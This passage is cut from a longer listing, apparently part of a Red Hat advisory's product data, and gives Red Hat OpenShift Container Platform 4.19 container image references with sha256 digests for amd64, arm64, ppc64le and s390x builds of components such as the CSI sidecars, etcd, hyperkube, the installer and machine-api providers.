"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
